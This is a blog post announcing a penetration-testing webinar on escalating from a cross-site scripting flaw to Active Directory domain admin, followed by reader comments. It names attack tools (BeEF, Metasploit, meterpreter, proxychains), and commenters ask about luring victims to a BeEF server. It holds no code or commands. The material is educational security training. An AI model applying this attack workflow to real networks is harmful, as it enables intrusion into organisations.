From XSS to Domain Admin

On August 26th, our Security Researcher Davide Girardi, a.k.a. GiRa, will present an exploitation scenario on a typical company network. The exploitation will start from a Cross-Site-Scripting flaw in the company blog and will get us to a full Active Directory Administrator account.

The network has up-to-date client and server operating systems, a DMZ between two firewalls and a company website.

As an image worth a thousand words, here it is a network diagram for you:

You have the opportunity to see some groovy usage of Beef-XSS, metasploit and some Active Directory knowlege.

I’m interested in heavy firewalls like the ZyXEL USG 2000, because that is more tight security.
What if you were in a Company with such security?. It does also have IDP & IPS. Beside that a spamfilter which is the NAT controls which mails(eg. Barracuda), are allowed or disallowed, and got it’s own database of signatures, for filtering out viruses, Worms etc..

One of the important things about many IDS systems is they are usually signature based so can only block what is known. So if there is a known XSS attack in WordPress and it has a signature, it can block it. But if it is a custom web-app, it will not have a signature for it and most likely will not block it. (again, depends on the specific IDS)

Some defenses to this are Web Application Firewalls which can monitor for XSS and injection strings, IDS systems can do heuristics or allow you to create custom signatures.. and cannot forget to mention – secure coding practices!

I believe the most important and effective defense against this specific type of attack is input validation and escaping. This alone can combat injection. Without it even the strongest IDS might be bypassed because as you said they are rule based and if no rule covers a custom injection pattern it will fall through as legit traffic.

It’s amazing how many websites are vulnerable to injection (XSS or SQL) especially taking into account how simple the solution is.

Offtopic: congrats on the great webinary, I was able to watch most of it after which the connection dropped (I was in a pub/restaurant). Can’t wait for the recording to watch it again properly.

Hey, thank you for sharing this one with us.
The question that came to my mind everytime I see pentesting demonstration like this is : does the pentester has prepared for this ? if yes, what will be different if he doesn’t ? I’m a new pentester and I want to know to how pentesters start their process.
thanks again.

As a pentester you have to write a full and comprehensive report of all the vulnerabilities in the scope of your engagement. To do so, you have to train yourself by studying and by making practice in a lab.

Of course from time to time you encounter new scenarios and new challenges. In those cases your knowledge, your method and your intelligence will help you to reach your goal. This, of course, takes time 😉

But, what if you had to invest a lot of time on every vulnerability you discover in your engagement? What if you have two weeks for a pentest of a system with three vulnerabilities and you have to invest ten days to exploit each vulnerability?

Hi,
My name is Devi , it is nice to see .I would like to learn about security testing, for this what is minimal subject I have to know first? I came from computer background and I did a QA tester job ,is it enough or any strong skill set? Pls let me know.
Thanks,
Devi.

Does the blog site supports CORS?
Im new to this so would you use nmap to scan the target and use a trace route to find out information about the multiple hosts on the network? Then metasploit framework to execute a remote connection to the specific host to be compromised? Will you be explaining the steps to gaining administrator privileges? Thank you

Are you only going to be using a canned exploit package like metasploit or are you going to use modified scripts/exploits? If you are using metasploit, I am assuming you will be using it along with proxychains to tunnel to other machines? And if we cannot make it to the live demo will it be up for replay later?

Hi davide,
I’m amazed by the opportunity that you are offering, and I was waiting for this webinar for long time. I have just one problem: when I reserved a seat in the webinar I didn’t know where I would have been the time of it.. Now I’m in the Balkans for holiday and tomorrow I’ll not be able to get the chance to follow the webinar in live. Is there any chance for you to record it so I will be able to watch once back at home?
Thank you so much anyway for the great opportunity you are giving us!

My Question is: We will be using BeEF to exploit browser vulnerabilities in order to gain root shell and then transfer our meterpreter shell to another service, but the thing is what, If i am doing penetration test against a Organization that doesn’t use any Vulnerable Browser?

Plus, We have to Social Engineer victim to go to our BeEF servers url, How is it possible in real life penetration test?

Can you guide me, Best Practicies for Browser Exploitation and XSS Social Engineering.